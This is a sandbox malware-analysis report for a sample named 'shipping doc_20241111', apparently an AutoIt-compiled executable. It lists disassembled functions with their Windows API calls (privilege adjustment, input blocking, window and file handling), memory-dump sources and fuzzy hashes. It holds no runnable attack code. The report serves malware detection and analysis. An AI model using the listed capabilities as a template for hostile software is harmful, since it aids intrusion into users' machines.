Instruction Fuzzy Hash: 58F0A0B160422A2AE72066B68C4DFEB3A6EEF84761F000166F909D2181DA609900D6B0

Function 00FA1003 Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FA1140), ref: 00FA1018
CloseHandle.KERNEL32(?,?,00FA1140), ref: 00FA102D

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 9ecab9b2cbd8713205497ec290648d429c7e570f450cad781f6dc754fb5aab5b
Instruction ID: 6ad9c613a0b4827bd9bd338dd249bd00bccfecb934810b87cc1d338b56eefa00
Opcode Fuzzy Hash: 9ecab9b2cbd8713205497ec290648d429c7e570f450cad781f6dc754fb5aab5b
Instruction Fuzzy Hash: 6CE04F72004601EEF7252B20EC09E727BA9FB05321B14C82EF99580470DB626C94EB50

Function 00F4E3F0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 00F9181B

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: 76109cf2c695d7a65d60dd3a604901aed06e09dd9d8777bd3efad4413eaf1cf8
Instruction ID: c3113bd2462e58957bea2e3fbca1c938fa7aa926c68100333b11f938a8f41952
Opcode Fuzzy Hash: 76109cf2c695d7a65d60dd3a604901aed06e09dd9d8777bd3efad4413eaf1cf8
Instruction Fuzzy Hash: 96329E75D00219DBEF14DF90C894BEDBBB5BF14314F144069EC06AB292DB39AE49EB60

Function 00F766FB Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,00F766F6,00000000,?,00000008,?,?,00F7FE9F,00000000), ref: 00F76928

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 3d8667c9762bdefc9906493c8c63f1d77ef34383f2c890b54bdace8cf23835b8
Instruction ID: 994e198aa190e6455d382803a3b71d46dd8040e7b4823207ba7dfdb56e0812e7
Opcode Fuzzy Hash: 3d8667c9762bdefc9906493c8c63f1d77ef34383f2c890b54bdace8cf23835b8
Instruction Fuzzy Hash: 93B16C32910A089FD719CF28C486B647BE0FF45364F25C659E99DCF2A2C735E982DB42

Function 00FBE9C9 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00FBE9E4

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: f346482a1ca6a493cd0ca97d8a332b95fde810f0de7e019c405b4b4884a0d879
Instruction ID: d00747ce1d68460e13b7ed74299cf49c5ed20e020057f364df273538f09e9d9f
Opcode Fuzzy Hash: f346482a1ca6a493cd0ca97d8a332b95fde810f0de7e019c405b4b4884a0d879
Instruction Fuzzy Hash: 85E0DF323002049FC740AF6AC841ADABBE8AF98760F008016FD89C7310CA70EC049BD0

Function 00F60955 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00020961,00F6036E), ref: 00F6095A

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 2ac2b89405d475af4cc2b5edb76dac34df1d0b00ab93e22ad3bc303e9960cb02
Instruction ID: cca5cc1f234bbeab07cb2c68cdf54f7147738cd018b533a5ff96ca9efc4618fc
Opcode Fuzzy Hash: 2ac2b89405d475af4cc2b5edb76dac34df1d0b00ab93e22ad3bc303e9960cb02
Instruction Fuzzy Hash:

Function 00F677AB Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 00F6791B

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 2cf9f399821d53f3719af7fe23b88af00dec94b6fce690fbd2bcd0043cf7b198
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 47513762E0C74566DB38B678495D7BF27D99B0236CF380609D882C7282C619EE46F356

Function 00F76D79 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05acd62340d8298926dd46851ad9a404dfc6916db1d4c2a8e3903b68948ca119
Instruction ID: ca9414685caf3710c58d75eb691cb50c59e11b57128e5b530aadb0ccef0b0392
Opcode Fuzzy Hash: 05acd62340d8298926dd46851ad9a404dfc6916db1d4c2a8e3903b68948ca119
Instruction Fuzzy Hash: 86326522D38F414DD763A634CC62335A24DAFB33D4F14D337E82AB99A5EB29C4836101

Function 00F5D3B5 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc1ebb885ab055ed7a199cbbf14beb2a4810cd02754438fcfd49bc40dd11a54f
Instruction ID: c611a2e37899eecbd2f95fe3a3c2361bc23ba77b5d32c428b38d6e60e53b84d8
Opcode Fuzzy Hash: cc1ebb885ab055ed7a199cbbf14beb2a4810cd02754438fcfd49bc40dd11a54f
Instruction Fuzzy Hash: F232FF32E002058BEF38CB2CC4946BD77A1AB42325F78812AD996DB695D334EDC5FB51

Function 00F492A0 Relevance: .6, Instructions: 564COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b369cdc1dc3fa0087c60e38774d0988bd92ec5330d99167f9b4303eef2755261
Instruction ID: 5574a617d26c6da01d69575b1bab0281df21209d759d064f1f664a6857147565
Opcode Fuzzy Hash: b369cdc1dc3fa0087c60e38774d0988bd92ec5330d99167f9b4303eef2755261
Instruction Fuzzy Hash: DC22C1B1E046059FDF14DFA4C881AEEB7F5FF48310F208129E816E7291EB39A915EB50

Function 00F4AB30 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b824ca6f8c26c2812774d6fc7a223de297d98cf7ac32701eda7a46411a9b6ef9
Instruction ID: a0b799e7674b1cab35776ba7f7553f345e9f5f2a7aef0de96d8e4618551d04a1
Opcode Fuzzy Hash: b824ca6f8c26c2812774d6fc7a223de297d98cf7ac32701eda7a46411a9b6ef9
Instruction Fuzzy Hash: C002E7B1E00205EFDB05EF64D881BEDBBB1FF44310F208169E9169B290EB35E955EB81

Function 00F61C07 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: ca09cccafcc9e56c1a5569cf7c3db6a9b8d189c694c70d397b6792c97f683fb2
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 57916473A080A34ADB6D863A857417EFFE17A523B131E079ED4F2CA1C5EE14D564F620

Function 00F61940 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: a6cc0d0b93dd7e6c14f5f9ff92cb2404e59c16ebb592168d5bfc85f5675b6c0b
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 77915D736090A34EEB2D467A857403EFEE16A923B131E479ED4F2CA1C5FE149564F620

Function 00F679DA Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18fb71cced12cf92376f8b2017234012354d1c010d7ae632da5a42d0e4adb101
Instruction ID: 00cf0feb9acf39e400e9a2bafcf2621782f6384befc5c3c5478672378164e500
Opcode Fuzzy Hash: 18fb71cced12cf92376f8b2017234012354d1c010d7ae632da5a42d0e4adb101
Instruction Fuzzy Hash: C6618B71A0830956DE34BEA84D91BBE3384DF8177CF140A1DE842CB2A6D91E9E82B355

Function 00F67C37 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e5673abc4cec7cd289f404e5c6be3d6d34d4caa19ef36e504ad703c5f2eaddc
Instruction ID: 601b9c1087736fa159a851f234b274ce0453dbc0dccba4b5b4dbd7ea1800722b
Opcode Fuzzy Hash: 4e5673abc4cec7cd289f404e5c6be3d6d34d4caa19ef36e504ad703c5f2eaddc
Instruction Fuzzy Hash: B8616C71E0C70957DB34BA288C92BBE7398EF8176CF140D1AE883DF281D6169D86B355

Function 00F61696 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 000f16e10cbd7b1f1d53a5993fc8063ef55aa77548c1358aaec586af4a2dad57
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 63816373A090A34ADB6D463A857447EFFE16A523B131E079ED4F2CB1C1EE24D564F620

Function 015AB978 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1670471404.00000000015A8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015A8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15a8000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: c766c880650975d76df044d0ba7bec9b2f7415c6667f3b56bf1fe8b1b5af01d8
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 1F41D571D1051CDBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90

Function 015AB868 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1670471404.00000000015A8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015A8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15a8000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 344785d6a324b2ccf93fd97bd64dbaa978ab2a909112c111ef702b5d3926c970
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 96018078A11109EFCB44DF98C5909AEF7B5FF88310F608599D819AB301D730AE41DB80

Function 015AB808 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1670471404.00000000015A8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015A8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15a8000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 898bbb02dd04433fef21d42946fdbffbe66587ab9f4c04b721c83eaf869de250
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: E8018078A41209EFCB48DF98C5909AEF7B5FB48310F608599D819AB301D730AE41DB80

Function 015AA1B8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1670471404.00000000015A8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015A8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15a8000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00FC2A05 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00FC2A57
DeleteObject.GDI32(00000000), ref: 00FC2A6A
DestroyWindow.USER32 ref: 00FC2A79
GetDesktopWindow.USER32 ref: 00FC2A94
GetWindowRect.USER32(00000000), ref: 00FC2A9B
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00FC2BCA
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00FC2BD8
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC2C1F
GetClientRect.USER32(00000000,?), ref: 00FC2C2B
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00FC2C67
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC2C89
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC2C9C
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC2CA7
GlobalLock.KERNEL32(00000000), ref: 00FC2CB0
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC2CBF
GlobalUnlock.KERNEL32(00000000), ref: 00FC2CC8
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC2CCF
GlobalFree.KERNEL32(00000000), ref: 00FC2CDA
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC2CEC
OleLoadPicture.OLEAUT32(?,00000000,00000000,00FDFC54,00000000), ref: 00FC2D02
GlobalFree.KERNEL32(00000000), ref: 00FC2D12
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00FC2D38
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00FC2D57
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC2D79
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC2F66

Strings

DISPLAY, xrefs: 00FC2DC9
AutoIt v3, xrefs: 00FC2C19
, xrefs: 00FC2EEC
static, xrefs: 00FC2C61, 00FC2DB8

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: e9bb640e49f48f52351d09196ff9a7ccded4dc1c45d4146a9a5113fc48d24a6a
Instruction ID: 85b789cf501c428d3d778b6bc7e17f27cbd4af270cd078faf8aeed61220e36cd
Opcode Fuzzy Hash: e9bb640e49f48f52351d09196ff9a7ccded4dc1c45d4146a9a5113fc48d24a6a
Instruction Fuzzy Hash: 69026F71A0021AAFDB14DF64CD49FAE7BBAFF48710F048159F915AB291CB74AD01DBA0

Function 00FD6FA4 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00FD6FFE
GetSysColorBrush.USER32(0000000F), ref: 00FD702F
GetSysColor.USER32(0000000F), ref: 00FD703B
SetBkColor.GDI32(?,000000FF), ref: 00FD7055
SelectObject.GDI32(?,?), ref: 00FD7064
InflateRect.USER32(?,000000FF,000000FF), ref: 00FD708F
GetSysColor.USER32(00000010), ref: 00FD7097
CreateSolidBrush.GDI32(00000000), ref: 00FD709E
FrameRect.USER32(?,?,00000000), ref: 00FD70AD
DeleteObject.GDI32(00000000), ref: 00FD70B4
InflateRect.USER32(?,000000FE,000000FE), ref: 00FD70FF
FillRect.USER32(?,?,?), ref: 00FD7131
GetWindowLongW.USER32(?,000000F0), ref: 00FD7153

Part of subcall function 00FD72B7: GetSysColor.USER32(00000012), ref: 00FD72F0
Part of subcall function 00FD72B7: SetTextColor.GDI32(?,?), ref: 00FD72F4
Part of subcall function 00FD72B7: GetSysColorBrush.USER32(0000000F), ref: 00FD730A
Part of subcall function 00FD72B7: GetSysColor.USER32(0000000F), ref: 00FD7315
Part of subcall function 00FD72B7: GetSysColor.USER32(00000011), ref: 00FD7332
Part of subcall function 00FD72B7: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00FD7340
Part of subcall function 00FD72B7: SelectObject.GDI32(?,00000000), ref: 00FD7351
Part of subcall function 00FD72B7: SetBkColor.GDI32(?,00000000), ref: 00FD735A
Part of subcall function 00FD72B7: SelectObject.GDI32(?,?), ref: 00FD7367
Part of subcall function 00FD72B7: InflateRect.USER32(?,000000FF,000000FF), ref: 00FD7386
Part of subcall function 00FD72B7: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00FD739D
Part of subcall function 00FD72B7: GetWindowLongW.USER32(00000000,000000F0), ref: 00FD73AA

Memory Dump Source

